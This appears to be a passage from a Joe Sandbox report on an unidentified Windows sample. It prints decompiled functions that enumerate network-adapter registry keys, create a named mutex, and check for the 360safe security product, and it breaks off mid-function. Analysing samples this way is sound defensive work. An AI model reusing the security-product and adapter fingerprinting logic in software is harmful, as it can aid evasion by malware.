                                                                                                                                                                                          Function 00C941D0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 134registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                          			E00C941D0(intOrPtr __ecx, void* __ebp, WCHAR* _a4, intOrPtr* _a8) {
				signed int _v8;
				short _v532;
				char _v1052;
				char _v1056;
				struct _FILETIME _v1060;
				void* _v1068;
				WCHAR* _v1072;
				intOrPtr _v1076;
				intOrPtr _v1080;
				void* _v1084;
				int _v1088;
				void* _v1092;
				int _v1096;
				int _v1100;
				int _v1104;
				void* _v1108;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				intOrPtr* _t44;
				int _t46;
				int _t48;
				void* _t50;
				long _t53;
				void* _t59;
				void* _t62;
				void* _t64;
				signed int _t80;

				_t80 =  &_v1108;
				_t41 =  *0xd64070; // 0x8a9e1774
				_v8 = _t41 ^ _t80;
				_v1072 = _a4;
				_t44 = _a8;
				 *_t44 = 0;
				_v1076 = __ecx;
				 *((intOrPtr*)(__ecx)) = 0;
				_v1080 = _t44;
				_v1084 = 0;
				if(RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}", 0, 8,  &_v1084) != 0) {
					_t46 = 0;
					goto L21;
				} else {
					_t76 = _v1084;
					_t48 = 0;
					_v1068 = _t76;
					_v1088 = 0;
					while(1) {
						_t74 =  &_v532;
						_t77 = 0x104;
						_v1104 = 0x104;
						if(RegEnumKeyExW(_t76, _t48,  &_v532,  &_v1104, 0, 0, 0,  &_v1060) != 0) {
							break;
						}
						_v1100 = 0;
						_v1092 = 0;
						_t53 = RegOpenKeyExW(_t76,  &_v532, 0, 1,  &_v1092);
						_v1096 = 0;
						if(_t53 != 0) {
							L11:
							_t48 = _v1088 + 1;
							_v1088 = _t48;
							if(_t48 < 0x100) {
								_t76 = _v1068;
								continue;
							}
							break;
						}
						_t64 = _v1092;
						_t74 =  &_v1100;
						_v1104 = 0x104;
						_t76 =  &_v1104;
						_t77 =  &_v1052;
						_v1100 = _t64;
						if(E00C92550( &_v1104, _t77,  &_v1100, L"NetCfgInstanceId") != 0 || StrCmpIW(_t77, _v1072) != 0) {
							if(_t64 != 0) {
								RegCloseKey(_t64);
								_v1100 = 0;
							}
							_v1096 = 0;
							goto L11;
						} else {
							_t74 =  &_v1104;
							_t76 =  &_v1108;
							_t77 =  &_v1056;
							_v1108 = 0x104;
							_t59 = E00C92550( &_v1108, _t77,  &_v1104, L"BusType");
							__eflags = _t59;
							if(_t59 == 0) {
								_push(_t77);
								_t62 = E00D032A3();
								_t80 = _t80 + 4;
								__eflags = _t62 - 5;
								if(__eflags == 0) {
									_t74 = _v1080;
									 *_v1084 = 1;
									E00C940A0(_t64, 0, __eflags, _v1080);
									_t80 = _t80 + 4;
								}
							}
							__eflags = _t64;
							if(_t64 != 0) {
								RegCloseKey(_t64);
							}
							break;
						}
					}
					_t50 = _v1068;
					if(_t50 != 0) {
						RegCloseKey(_t50);
					}
					_t46 = 1;
					L21:
					return E00D0071A(_t46, _t64, _v8 ^ _t80, _t74, _t76, _t77);
				}
			}
































                                                                                                                                                                                          0x00c941d0
                                                                                                                                                                                          0x00c941d6
                                                                                                                                                                                          0x00c941dd
                                                                                                                                                                                          0x00c941f0
                                                                                                                                                                                          0x00c941f4
                                                                                                                                                                                          0x00c941fc
                                                                                                                                                                                          0x00c941fe
                                                                                                                                                                                          0x00c94202
                                                                                                                                                                                          0x00c94216
                                                                                                                                                                                          0x00c9421a
                                                                                                                                                                                          0x00c94226
                                                                                                                                                                                          0x00c94238
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94228
                                                                                                                                                                                          0x00c94228
                                                                                                                                                                                          0x00c9422c
                                                                                                                                                                                          0x00c9422e
                                                                                                                                                                                          0x00c94232
                                                                                                                                                                                          0x00c94244
                                                                                                                                                                                          0x00c94251
                                                                                                                                                                                          0x00c9425a
                                                                                                                                                                                          0x00c94260
                                                                                                                                                                                          0x00c9426c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94283
                                                                                                                                                                                          0x00c94287
                                                                                                                                                                                          0x00c9428b
                                                                                                                                                                                          0x00c94291
                                                                                                                                                                                          0x00c94297
                                                                                                                                                                                          0x00c942e5
                                                                                                                                                                                          0x00c942e9
                                                                                                                                                                                          0x00c942ef
                                                                                                                                                                                          0x00c942f3
                                                                                                                                                                                          0x00c94240
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94240
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c942f9
                                                                                                                                                                                          0x00c94299
                                                                                                                                                                                          0x00c942a2
                                                                                                                                                                                          0x00c942a6
                                                                                                                                                                                          0x00c942ab
                                                                                                                                                                                          0x00c942af
                                                                                                                                                                                          0x00c942b3
                                                                                                                                                                                          0x00c942be
                                                                                                                                                                                          0x00c942d4
                                                                                                                                                                                          0x00c942d7
                                                                                                                                                                                          0x00c942dd
                                                                                                                                                                                          0x00c942dd
                                                                                                                                                                                          0x00c942e1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c942fb
                                                                                                                                                                                          0x00c94300
                                                                                                                                                                                          0x00c94305
                                                                                                                                                                                          0x00c94309
                                                                                                                                                                                          0x00c9430d
                                                                                                                                                                                          0x00c94315
                                                                                                                                                                                          0x00c9431a
                                                                                                                                                                                          0x00c9431c
                                                                                                                                                                                          0x00c94320
                                                                                                                                                                                          0x00c94321
                                                                                                                                                                                          0x00c94326
                                                                                                                                                                                          0x00c94329
                                                                                                                                                                                          0x00c9432c
                                                                                                                                                                                          0x00c94332
                                                                                                                                                                                          0x00c94336
                                                                                                                                                                                          0x00c9433f
                                                                                                                                                                                          0x00c94344
                                                                                                                                                                                          0x00c94344
                                                                                                                                                                                          0x00c9432c
                                                                                                                                                                                          0x00c94347
                                                                                                                                                                                          0x00c94349
                                                                                                                                                                                          0x00c9434c
                                                                                                                                                                                          0x00c9434c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94349
                                                                                                                                                                                          0x00c942be
                                                                                                                                                                                          0x00c94352
                                                                                                                                                                                          0x00c94358
                                                                                                                                                                                          0x00c9435b
                                                                                                                                                                                          0x00c9435b
                                                                                                                                                                                          0x00c94361
                                                                                                                                                                                          0x00c94366
                                                                                                                                                                                          0x00c9437e
                                                                                                                                                                                          0x00c9437e

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318},00000000,00000008,?,?,?,?,00000000), ref: 00C9421E
                                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32 ref: 00C94264
                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00C9428B
                                                                                                                                                                                            • Part of subcall function 00C92550: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00C90027), ref: 00C92577
                                                                                                                                                                                          • StrCmpIW.SHLWAPI(?,?,?,NetCfgInstanceId), ref: 00C942C8
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,NetCfgInstanceId), ref: 00C942D7
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C9434C
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C9435B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • NetCfgInstanceId, xrefs: 00C9429D
                                                                                                                                                                                          • SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}, xrefs: 00C9420C
                                                                                                                                                                                          • BusType, xrefs: 00C942FB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Close$Open$EnumQueryValue
                                                                                                                                                                                          • String ID: BusType$NetCfgInstanceId$SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
                                                                                                                                                                                          • API String ID: 1772848689-2100781267
                                                                                                                                                                                          • Opcode ID: d88346e51c5f658c2db71367f66ff6a3f39719a6d3a115de8ace6f6617de2e86
                                                                                                                                                                                          • Instruction ID: 8629c47c1b30ca1643cc71a265f20d615fcd7c13daeecdb635c83852534f9f3d
                                                                                                                                                                                          • Opcode Fuzzy Hash: d88346e51c5f658c2db71367f66ff6a3f39719a6d3a115de8ace6f6617de2e86
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E416DB1608345AFC714DF65D888E5BBBE8FB88744F40491DF68AD3250D770E9098B62
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8B4CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104synchronizationlibraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                          			E00C8B4CC(long __ebx, void* __edx, long __edi) {
				void* _t17;
				_Unknown_base(*)()* _t23;
				struct HINSTANCE__* _t24;
				struct _SECURITY_ATTRIBUTES* _t27;
				void* _t28;
				long _t32;
				void* _t45;
				long _t47;
				void* _t51;
				void* _t55;
				void* _t56;

				_t47 = __edi;
				_t45 = __edx;
				_t32 = __ebx;
				asm("sbb eax, 0xd6902c");
				 *(_t55 + 0x20) = 0;
				 *0xd69014 = 0;
				 *0xd69018 = 0;
				 *0xd6901c = 0;
				 *0xd69020 = 0;
				 *0xd69024 = 0;
				 *0xd69028 = 0;
				_t17 = E00C8DE80();
				_t60 = _t17;
				if(_t17 < 0) {
					E00C8DF10(_t17);
				}
				E00D010C4(_t60, 0xd39630);
				_t56 = _t55 + 4;
				 *(_t56 + 0x20) = _t47;
				if(( *0xd6902c & 0x00000002) == 0) {
					 *0xd6902c =  *0xd6902c | 0x00000002;
					 *(_t56 + 0x20) = _t32;
					 *0xd6900c = 0;
					E00D010C4( *0xd6902c, 0xd39610);
					_t56 = _t56 + 4;
					 *(_t56 + 0x20) = _t47;
				}
				EnterCriticalSection(0xd69014);
				if( *0xd69010 != 0 ||  *0xd6900c != 0) {
					L10:
					LeaveCriticalSection(0xd69014);
					 *(_t56 + 0x14) = 0xd6900c;
					WaitForSingleObject( *0xd6900c, _t47);
					 *(_t56 + 0x10) = _t32;
					 *(_t56 + 0x20) = 2;
					__eflags =  *0xd69010;
					if( *0xd69010 != 0) {
						L13:
						 *(_t56 + 0x20) = _t47;
						ReleaseMutex( *0xd6900c);
						_t23 = GetProcAddress( *0xd69010,  *(_t51 + 8));
						 *[fs:0x0] =  *((intOrPtr*)(_t56 + 0x18));
						return _t23;
					} else {
						_t24 = L00C8B050(_t45);
						 *0xd69010 = _t24;
						__eflags = _t24;
						if(_t24 != 0) {
							goto L13;
						} else {
							 *(_t56 + 0x20) = _t47;
							ReleaseMutex( *0xd6900c);
							__eflags = 0;
							 *[fs:0x0] =  *((intOrPtr*)(_t56 + 0x18));
							return 0;
						}
					}
				} else {
					_t27 = OpenMutexW(0x1f0001, 0, L"{A2CE3D3C-15E7-4985-B2C5-58F681DD07A5}");
					 *0xd6900c = _t27;
					if(_t27 != 0) {
						goto L10;
					} else {
						_t28 = CreateMutexW(_t27, _t27, L"{A2CE3D3C-15E7-4985-B2C5-58F681DD07A5}");
						 *0xd6900c = _t28;
						if(_t28 != 0) {
							goto L10;
						} else {
							LeaveCriticalSection(0xd69014);
							 *[fs:0x0] =  *((intOrPtr*)(_t56 + 0x18));
							return 0;
						}
					}
				}
			}














                                                                                                                                                                                          0x00c8b4cc
                                                                                                                                                                                          0x00c8b4cc
                                                                                                                                                                                          0x00c8b4cc
                                                                                                                                                                                          0x00c8b4cc
                                                                                                                                                                                          0x00c8b4d3
                                                                                                                                                                                          0x00c8b4e0
                                                                                                                                                                                          0x00c8b4e5
                                                                                                                                                                                          0x00c8b4ea
                                                                                                                                                                                          0x00c8b4ef
                                                                                                                                                                                          0x00c8b4f4
                                                                                                                                                                                          0x00c8b4f9
                                                                                                                                                                                          0x00c8b4fe
                                                                                                                                                                                          0x00c8b503
                                                                                                                                                                                          0x00c8b505
                                                                                                                                                                                          0x00c8b508
                                                                                                                                                                                          0x00c8b508
                                                                                                                                                                                          0x00c8b512
                                                                                                                                                                                          0x00c8b517
                                                                                                                                                                                          0x00c8b51a
                                                                                                                                                                                          0x00c8b525
                                                                                                                                                                                          0x00c8b527
                                                                                                                                                                                          0x00c8b52e
                                                                                                                                                                                          0x00c8b537
                                                                                                                                                                                          0x00c8b541
                                                                                                                                                                                          0x00c8b546
                                                                                                                                                                                          0x00c8b549
                                                                                                                                                                                          0x00c8b549
                                                                                                                                                                                          0x00c8b552
                                                                                                                                                                                          0x00c8b55f
                                                                                                                                                                                          0x00c8b5ba
                                                                                                                                                                                          0x00c8b5bf
                                                                                                                                                                                          0x00c8b5cc
                                                                                                                                                                                          0x00c8b5d4
                                                                                                                                                                                          0x00c8b5da
                                                                                                                                                                                          0x00c8b5de
                                                                                                                                                                                          0x00c8b5e6
                                                                                                                                                                                          0x00c8b5ed
                                                                                                                                                                                          0x00c8b622
                                                                                                                                                                                          0x00c8b622
                                                                                                                                                                                          0x00c8b62d
                                                                                                                                                                                          0x00c8b63e
                                                                                                                                                                                          0x00c8b648
                                                                                                                                                                                          0x00c8b655
                                                                                                                                                                                          0x00c8b5ef
                                                                                                                                                                                          0x00c8b5ef
                                                                                                                                                                                          0x00c8b5f4
                                                                                                                                                                                          0x00c8b5f9
                                                                                                                                                                                          0x00c8b5fb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8b5fd
                                                                                                                                                                                          0x00c8b5fd
                                                                                                                                                                                          0x00c8b608
                                                                                                                                                                                          0x00c8b60e
                                                                                                                                                                                          0x00c8b614
                                                                                                                                                                                          0x00c8b621
                                                                                                                                                                                          0x00c8b621
                                                                                                                                                                                          0x00c8b5fb
                                                                                                                                                                                          0x00c8b56a
                                                                                                                                                                                          0x00c8b576
                                                                                                                                                                                          0x00c8b57c
                                                                                                                                                                                          0x00c8b583
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8b585
                                                                                                                                                                                          0x00c8b58c
                                                                                                                                                                                          0x00c8b592
                                                                                                                                                                                          0x00c8b599
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8b59b
                                                                                                                                                                                          0x00c8b5a0
                                                                                                                                                                                          0x00c8b5ac
                                                                                                                                                                                          0x00c8b5b9
                                                                                                                                                                                          0x00c8b5b9
                                                                                                                                                                                          0x00c8b599
                                                                                                                                                                                          0x00c8b583

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00C8DE80: InitializeCriticalSection.KERNEL32(?,8A9E1774,000000FF,?,00000000,00D59874,00C8CCF8), ref: 00C8DEBB
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00D69014,8A9E1774), ref: 00C8B552
                                                                                                                                                                                          • OpenMutexW.KERNEL32(001F0001,00000000,{A2CE3D3C-15E7-4985-B2C5-58F681DD07A5}), ref: 00C8B576
                                                                                                                                                                                          • CreateMutexW.KERNEL32(00000000,00000000,{A2CE3D3C-15E7-4985-B2C5-58F681DD07A5}), ref: 00C8B58C
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00D69014), ref: 00C8B5A0
                                                                                                                                                                                            • Part of subcall function 00C8DF10: __CxxThrowException@8.LIBCMT ref: 00C8DF22
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00D69014), ref: 00C8B5BF
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,00C8A25A,Report_D5S), ref: 00C8B5D4
                                                                                                                                                                                          • ReleaseMutex.KERNEL32(?), ref: 00C8B608
                                                                                                                                                                                          • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00C8A25A,Report_D5S), ref: 00C8B62D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00C8B63E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalMutexSection$LeaveRelease$AddressCreateEnterException@8InitializeObjectOpenProcSingleThrowWait
                                                                                                                                                                                          • String ID: {A2CE3D3C-15E7-4985-B2C5-58F681DD07A5}
                                                                                                                                                                                          • API String ID: 1083608638-2563637749
                                                                                                                                                                                          • Opcode ID: 2c02dae808933611b6c78a0512cc01e24a55f983b43dd04cc650c76bdf500cb7
                                                                                                                                                                                          • Instruction ID: a9194d707313fd36d3ee1af431b59ec829ca758b6866fa88220e4cad67c51a0a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c02dae808933611b6c78a0512cc01e24a55f983b43dd04cc650c76bdf500cb7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 43410EB5A08341DFDB10DFA5EC2971ABBE8FB58319F00452DE989C23A0E7B58504DB76
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8E830 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 79libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                          			E00C8E830(void* __ebx, void* __eflags) {
				signed int _v8;
				signed int _v36;
				char _v2058;
				void _v2060;
				int _v2068;
				int _v2072;
				short _v2080;
				short _v2088;
				char _v2092;
				signed int _v2104;
				void* __edi;
				void* __esi;
				signed int _t19;
				void* _t34;
				void* _t48;
				struct HINSTANCE__* _t50;
				signed int _t51;
				signed int _t52;

				_t38 = __ebx;
				_t19 =  *0xd64070; // 0x8a9e1774
				_v8 = _t19 ^ _t51;
				_v2060 = 0;
				E00D006A0(_t48,  &_v2058, 0, 0x7fe);
				_t52 = _t51 + 0xc;
				_t47 =  &_v2068;
				_v2072 = 1;
				_v2068 = 0x800;
				if(SHGetValueW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe", L"Path",  &_v2072,  &_v2060,  &_v2068) == 0) {
					_t47 =  &_v2080;
					PathCombineW( &_v2080,  &_v2080, L"360ver.dll");
					__eflags = PathFileExistsW( &_v2088);
					if(__eflags == 0) {
						goto L1;
					} else {
						_t47 =  &_v2092;
						_v2104 = 0;
						E00C8E260(__eflags,  &_v2088,  &_v2104,  &_v2092);
						_t52 = _t52 + 0xc;
						__eflags = _v2104;
						if(__eflags == 0) {
							goto L1;
						} else {
							_t47 =  &_v2088;
							_t50 = E00C8E730(__ebx, __eflags,  &_v2088);
							__eflags = _t50;
							if(_t50 == 0) {
								goto L1;
							} else {
								_t34 =  *(GetProcAddress(_t50, "IsBetaVersion"))();
								FreeLibrary(_t50);
								__eflags = _v36 ^ _t52;
								return E00D0071A(_t34, __ebx, _v36 ^ _t52,  &_v2088, _t34, _t50);
							}
						}
					}
				} else {
					L1:
					return E00D0071A(1, _t38, _v36 ^ _t52, _t47, _t48, _t50);
				}
			}





















                                                                                                                                                                                          0x00c8e830
                                                                                                                                                                                          0x00c8e836
                                                                                                                                                                                          0x00c8e83d
                                                                                                                                                                                          0x00c8e853
                                                                                                                                                                                          0x00c8e858
                                                                                                                                                                                          0x00c8e85d
                                                                                                                                                                                          0x00c8e860
                                                                                                                                                                                          0x00c8e87e
                                                                                                                                                                                          0x00c8e886
                                                                                                                                                                                          0x00c8e896
                                                                                                                                                                                          0x00c8e8b9
                                                                                                                                                                                          0x00c8e8c1
                                                                                                                                                                                          0x00c8e8d2
                                                                                                                                                                                          0x00c8e8d4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8e8d6
                                                                                                                                                                                          0x00c8e8d6
                                                                                                                                                                                          0x00c8e8e5
                                                                                                                                                                                          0x00c8e8ed
                                                                                                                                                                                          0x00c8e8f2
                                                                                                                                                                                          0x00c8e8f5
                                                                                                                                                                                          0x00c8e8fa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8e8fc
                                                                                                                                                                                          0x00c8e8fc
                                                                                                                                                                                          0x00c8e906
                                                                                                                                                                                          0x00c8e908
                                                                                                                                                                                          0x00c8e90a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8e90c
                                                                                                                                                                                          0x00c8e918
                                                                                                                                                                                          0x00c8e91d
                                                                                                                                                                                          0x00c8e92e
                                                                                                                                                                                          0x00c8e93b
                                                                                                                                                                                          0x00c8e93b
                                                                                                                                                                                          0x00c8e90a
                                                                                                                                                                                          0x00c8e8fa
                                                                                                                                                                                          0x00c8e898
                                                                                                                                                                                          0x00c8e898
                                                                                                                                                                                          0x00c8e8b3
                                                                                                                                                                                          0x00c8e8b3

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C8E858
                                                                                                                                                                                          • SHGetValueW.SHLWAPI ref: 00C8E88E
                                                                                                                                                                                          • PathCombineW.SHLWAPI(?,?,360ver.dll), ref: 00C8E8C1
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(80000002), ref: 00C8E8CC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsBetaVersion), ref: 00C8E912
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00C8E91D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Path$AddressCombineExistsFileFreeLibraryProcValue_memset
                                                                                                                                                                                          • String ID: 360ver.dll$IsBetaVersion$Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
                                                                                                                                                                                          • API String ID: 438980795-3038173084
                                                                                                                                                                                          • Opcode ID: cac0df62fec96c501121d614be5e10e0b7b5c86d47a1e7196341e9fac03655a7
                                                                                                                                                                                          • Instruction ID: ea263774810e9ca4a0385e6083356b292a2fa9de7d27746b3eb7448b1c5037ce
                                                                                                                                                                                          • Opcode Fuzzy Hash: cac0df62fec96c501121d614be5e10e0b7b5c86d47a1e7196341e9fac03655a7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B212E71604301ABD314EF68D845BAF77E9EFC8704F44891DF589D2290EAB49A098BB7
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C948D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 171registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E00C948D0(void* __ebp, intOrPtr _a4) {
				int _v4;
				char _v8;
				char _v12;
				signed int _v20;
				short _v540;
				char _v1060;
				struct _FILETIME _v1068;
				int _v1072;
				int _v1076;
				char _v1080;
				int _v1084;
				void* _v1088;
				intOrPtr _v1092;
				void* _v1096;
				int _v1100;
				int _v1104;
				int _v1108;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t62;
				signed int _t64;
				signed int _t69;
				int _t71;
				void* _t80;
				intOrPtr* _t86;
				int _t91;
				void* _t92;
				signed int _t108;
				void* _t111;
				void* _t112;
				void* _t117;
				signed int _t123;
				void* _t128;
				void* _t129;
				signed int _t130;

				_push(0xffffffff);
				_push(0xd39011);
				_push( *[fs:0x0]);
				_t130 = _t129 - 0x448;
				_t62 =  *0xd64070; // 0x8a9e1774
				_v20 = _t62 ^ _t130;
				_t64 =  *0xd64070; // 0x8a9e1774
				_push(_t64 ^ _t130);
				 *[fs:0x0] =  &_v12;
				_t91 = 0;
				_v1092 = _a4;
				_v1076 = 0;
				_v1072 = 0;
				_v4 = 0;
				_v1096 = 0;
				if(RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}", 0, 8,  &_v1096) != 0) {
					_t69 = 0;
				} else {
					_t112 = _v1096;
					_t71 = 0;
					_v1076 = _t112;
					_v1072 = 0;
					_v1084 = 0;
					while(1) {
						_t106 =  &_v540;
						_v1100 = 0x104;
						if(RegEnumKeyExW(_t112, _t71,  &_v540,  &_v1100, _t91, _t91, _t91,  &_v1068) != 0) {
							break;
						}
						_v1108 = _t91;
						_v1104 = _t91;
						_v4 = 1;
						_v1088 = _t91;
						if(RegOpenKeyExW(_t112,  &_v540, _t91, 1,  &_v1088) != _t91) {
							_v4 = _t91;
							_v1104 = _t91;
						} else {
							_t128 = _v1088;
							_t106 =  &_v1108;
							_v1100 = 0x104;
							_v1108 = _t128;
							_v1104 = _t91;
							if(E00C92550( &_v1100,  &_v1060,  &_v1108, L"BusType") == 0) {
								_push( &_v1060);
								_t80 = E00D032A3();
								_t130 = _t130 + 4;
								if(_t80 != 5) {
									goto L5;
								} else {
									_v1100 = 0x104;
									if(E00C92550( &_v1100,  &_v1060,  &_v1108, L"NetCfgInstanceId") != 0) {
										goto L5;
									} else {
										_t108 =  &_v1080;
										E00C94FC0( &_v1060, _t128, _t108);
										_v8 = 2;
										E00C951F0( &_v1084, _v1096);
										_v8 = 1;
										_t86 = _v1084 + 0xfffffff0;
										asm("lock xadd [ecx], edx");
										_t106 = (_t108 | 0xffffffff) - 1;
										if((_t108 | 0xffffffff) - 1 <= 0) {
											_t106 =  *((intOrPtr*)( *_t86));
